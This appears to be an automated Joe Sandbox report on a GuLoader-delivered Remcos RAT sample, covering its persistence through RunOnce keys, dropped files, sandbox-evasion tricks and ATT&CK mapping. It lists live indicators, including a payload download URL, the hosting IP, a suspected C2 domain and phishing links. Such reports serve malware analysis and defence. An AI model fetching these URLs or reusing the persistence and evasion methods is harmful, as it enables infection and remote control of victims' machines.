Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1444216544.0000000004C79000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Code function: 0_2_73B01B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73B01B5F

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

File created: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr

Jump to dropped file

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	File created: C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr			Jump to dropped file
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	File created: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll			Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr			Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr			Jump to behavior

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\myriam	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\myriam\Fonerne237	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skovmandshilsnerne.lnk	Jump to behavior

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Opens the same file many times (likely Sandbox evasion)

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

File opened: \Device\RasAcd count: 184819

Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	API/Special instruction interceptor: Address: 4F98E86
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	API/Special instruction interceptor: Address: 1AD8E86

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	RDTSC instruction interceptor: First address: 4F5824C second address: 4F5824C instructions: 0x00000000 rdtsc 0x00000002 test cx, 3986h 0x00000007 cmp ah, bh 0x00000009 cmp ebx, ecx 0x0000000b jc 00007F0A287374EEh 0x0000000d cmp di, E0BCh 0x00000012 inc ebp 0x00000013 inc ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	RDTSC instruction interceptor: First address: 1A9824C second address: 1A9824C instructions: 0x00000000 rdtsc 0x00000002 test cx, 3986h 0x00000007 cmp ah, bh 0x00000009 cmp ebx, ecx 0x0000000b jc 00007F0A28B3ED9Eh 0x0000000d cmp di, E0BCh 0x00000012 inc ebp 0x00000013 inc ebx 0x00000014 rdtsc

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Window / User API: threadDelayed 5323			Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Window / User API: threadDelayed 3022			Jump to behavior

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 4100	Thread sleep count: 5323 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 4100	Thread sleep time: -15969000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 6588	Thread sleep count: 238 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 6588	Thread sleep time: -238000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 4100	Thread sleep count: 3022 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 4100	Thread sleep time: -9066000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 6588	Thread sleep count: 69 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 6588	Thread sleep time: -69000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_0040672B FindFirstFileW,FindClose,	0_2_0040672B
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405AFA
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 2_2_00402868 FindFirstFileW,	2_2_00402868
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 2_2_0040672B FindFirstFileW,FindClose,	2_2_0040672B
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	Code function: 2_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405AFA

Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005881000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.00000000058B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	API call chain: ExitProcess graph end node			graph_0-4556
Source: C:\Users\user\Desktop\ix8kxoBHDb.exe	API call chain: ExitProcess graph end node			graph_0-4711

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Code function: 0_2_73B01B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73B01B5F

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Process created: C:\Users\user\Desktop\ix8kxoBHDb.exe "C:\Users\user\Desktop\ix8kxoBHDb.exe"

Jump to behavior

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034A5

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ix8kxoBHDb.exe PID: 7876, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\ix8kxoBHDb.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-X164UO

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ix8kxoBHDb.exe PID: 7876, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	111 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	31 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	11 Virtualization/Sandbox Evasion	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	111 Registry Run Keys / Startup Folder	1 Access Token Manipulation	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	11 Process Injection	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	23 System Information Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ix8kxoBHDb.exe	63%	ReversingLabs	Win32.Backdoor.Remcos
ix8kxoBHDb.exe	70%	Virustotal		Browse
ix8kxoBHDb.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr	63%	ReversingLabs	Win32.Backdoor.Remcos

Source	Detection	Scanner	Label
https://www.healthselflesssupplies.co.za/%	0%	Avira URL Cloud	safe
https://www.healthselflesssupplies.co.za/	0%	Avira URL Cloud	safe
https://www.healthselflesssupplies.co.za/cdOCcPHZK213.bins	0%	Avira URL Cloud	safe
https://www.healthselflesssupplies.co.za/cdOCcPHZK213.bin	0%	Avira URL Cloud	safe
ro	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
healthselflesssupplies.co.za	164.160.91.32	true	false	unknown
www.healthselflesssupplies.co.za	unknown	unknown	false	unknown
kezdns.pro	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
ro	true	Avira URL Cloud: safe	unknown
https://www.healthselflesssupplies.co.za/cdOCcPHZK213.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.healthselflesssupplies.co.za/%	ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	ix8kxoBHDb.exe, Leucocytopenia.scr.2.dr	false		high
https://www.healthselflesssupplies.co.za/	ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.healthselflesssupplies.co.za/cdOCcPHZK213.bins	ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005858000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
164.160.91.32	healthselflesssupplies.co.za	South Africa		328037	ElitehostZA	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588998
Start date and time:	2025-01-11 08:10:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ix8kxoBHDb.exe renamed because original name is a hash value
Original Sample Name:	d0625305c7cada6abafc98eca583c35ac2e25028cb63f43fee168b9bb6c5f8fb.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/11@45/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 55 Number of non-executed functions: 71
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ix8kxoBHDb.exe, PID 7876 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:12:24	API Interceptor	1810943x Sleep call for process: ix8kxoBHDb.exe modified
08:11:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr
08:11:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
164.160.91.32	IpykYx5iwz.exe	Get hash	malicious	Remcos, GuLoader	Browse
	KO0q4biYfC.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Quote Qu11262024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Purchase-Order27112024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ElitehostZA	IpykYx5iwz.exe	Get hash	malicious	Remcos, GuLoader	Browse	164.160.91.32
	KO0q4biYfC.exe	Get hash	malicious	Remcos, GuLoader	Browse	164.160.91.32
	Quote Qu11262024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	164.160.91.32
	Purchase-Order27112024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	164.160.91.32
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	164.160.91.32
	https://url.us.m.mimecastprotect.com/s/E9vACKrzxZSDM5kTOI6-C?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	164.160.91.37
	https://filmsinvest.com/material/?interprete=UTJGeWJXVnNidz09LFltVnlaMlYyYVdkcFlTNWpiMjA9LFkyRnliV1ZzYnk1allXNWhiR1Z6	Get hash	malicious	Unknown	Browse	164.160.91.31
	https://filmsinvest.com/material/?statement=UkdGMmFXUT0sZW1sd2NHOHVZMjl0LFpHZGhiR3hwYTJWeQ==	Get hash	malicious	Unknown	Browse	164.160.91.31
	http://www.fire.co.za	Get hash	malicious	Unknown	Browse	164.160.91.17
	https://bsigroup.apor.co.za/sgfkze/ZGF2aWQubXVnZW55aUBic2lncm91cC5jb20=	Get hash	malicious	Unknown	Browse	164.160.91.23

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	164.160.91.32
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	164.160.91.32
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	164.160.91.32
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	164.160.91.32
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	164.160.91.32
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	164.160.91.32
	AM983ebb5F.exe	Get hash	malicious	GuLoader	Browse	164.160.91.32
	av8XPPpdBc.exe	Get hash	malicious	GuLoader	Browse	164.160.91.32
	QNuQ5e175D.exe	Get hash	malicious	GuLoader	Browse	164.160.91.32
	7uY105UTJU.exe	Get hash	malicious	GuLoader	Browse	164.160.91.32

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4AMVusDMPP.exe	Get hash	malicious	GuLoader	Browse
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	WGi85dsMNp.exe	Get hash	malicious	GuLoader	Browse
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BaConf.ini

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	48
Entropy (8bit):	4.829448698502606
Encrypted:	false
SSDEEP:	3:15KlW9HAQLQIfLBJXlFGfv:1IlW9gQkIPeH
MD5:	E7F60749537446D1C77072173B5415A3
SHA1:	B9CFEF43585C8B26A5DAA2FE581859759A183C67
SHA-256:	3E1FC0E4A2EA442BF9F3DD4AE9444F8C595B9E7701DE2FD7ABCF7F7B29D9C683
SHA-512:	D125EDEA7D087009C00747B7C695A21F99B330DD5058FB0A2E3CD68EAFCACA63CAD591722DA6355A0FBC60D2E9710877BFAC713ECEEA64E7D9E6133599AFE884
Malicious:	false
Reputation:	low
Preview:	[ExReBoot]..Acc=user32::EnumWindows(i r2 ,i 0)..

C:\Users\user\AppData\Local\Temp\nslD2DA.tmp

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 72069123252974004469760.000000
Category:	dropped
Size (bytes):	1313973
Entropy (8bit):	3.508594159446496
Encrypted:	false
SSDEEP:	6144:f2skF7pUvuvCIv8qXCQnXa3i45gOkf9r001oK/gRrqAp5ktoP50sUjj6gX6QM25Q:f2skFO6CbgnqFNY9AbesZfHth2CKJKSq
MD5:	1934F562773490B68C7BF52DB4FA88B9
SHA1:	E6D1EFC0B3E28A4BECAC04600F4F42F0087B0D69
SHA-256:	0EE79FFDC0612D496B06362E2567E476CD57277130B1AF9CF44A9239D1D83DB3
SHA-512:	4EB715DBE0CB8C940D7762CB905CC3725141FFD67866BF73E671B58F52EE7AFC5FD0B0FBCF18D8E5E1E7D8B07211B62EFFD75EAFBB4A86FD289FEB616763D5F0
Malicious:	false
Reputation:	low
Preview:	.#......,...................m............".......#..........................................................t.x.............................................................................................................................................................................G...R...............j...........................................................................................................................................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.719859767584478
Encrypted:	false
SSDEEP:	192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
MD5:	0D7AD4F45DC6F5AA87F606D0331C6901
SHA1:	48DF0911F0484CBE2A8CDD5362140B63C41EE457
SHA-256:	3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
SHA-512:	C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: c7WJL1gt32.exe, Detection: malicious, Browse Filename: ZaRP7yvL1J.exe, Detection: malicious, Browse Filename: 4AMVusDMPP.exe, Detection: malicious, Browse Filename: 4AMVusDMPP.exe, Detection: malicious, Browse Filename: WGi85dsMNp.exe, Detection: malicious, Browse Filename: WGi85dsMNp.exe, Detection: malicious, Browse Filename: czHx16QwGQ.exe, Detection: malicious, Browse Filename: rXKfKM0T49.exe, Detection: malicious, Browse Filename: b5BQbAhwVD.exe, Detection: malicious, Browse Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	514430
Entropy (8bit):	7.954530383366024
Encrypted:	false
SSDEEP:	12288:B7MyjkhHoKi/5FeA7Bp8YNs8z0UTcmQo8CJsGmZ:B7M86ghxTRdJshZ
MD5:	D09DBFCAACC4E72DC2FF2D9119B7B9F1
SHA1:	8691AC9BBABBE829446B56C73888D8A0ADF0B92B
SHA-256:	D0625305C7CADA6ABAFC98ECA583C35AC2E25028CB63F43FEE168B9BB6C5F8FB
SHA-512:	B263E88A053292DD0F12DFFC01BE23E90198FB05591BACAB6471AFDC9A49254C65AB560301EDADA29E4051F698AD8BB1DE1E6563338E7EA51CA3032670F0C75F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.......4............@..........................`............@.......................................... ..`1...........................................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...X............~..............@....ndata...p...............................rsrc...`1... ...2..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmc.ini

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	4.134336113194451
Encrypted:	false
SSDEEP:	3:iGAeSMn:lAeZ
MD5:	7AB6006A78C23C5DEC74C202B85A51A4
SHA1:	C0FF9305378BE5EC16A18127C171BB9F04D5C640
SHA-256:	BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
SHA-512:	40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Access]..Setting=Enabled..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skovmandshilsnerne.lnk

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	874
Entropy (8bit):	3.3951840275462395
Encrypted:	false
SSDEEP:	12:8wl0o0m/3BV6XDPK827Mex9sl9fW+wR27Mvsl9BMJOoL6CNbw4t2YZ/elFlSJm:8kJ/B8Krm9e+wk92w2bIqy
MD5:	61D3C4D77CBCA1AE04559422C932EFE7
SHA1:	07E98507BB562BFF3939D341D22D7E8B6DEF27B2
SHA-256:	08790BA95B132630A2EB17C576F57CA8CA0122739F6438EEBD26803C8B73A301
SHA-512:	9075464885F86366BF0C22CF418867EC284D1FB377C2333031AEE5382322269BF99B1AF0439C4E3455023F750D4CCFAB74FCB34DCAF65EE1315CE60E442DCA31
Malicious:	false
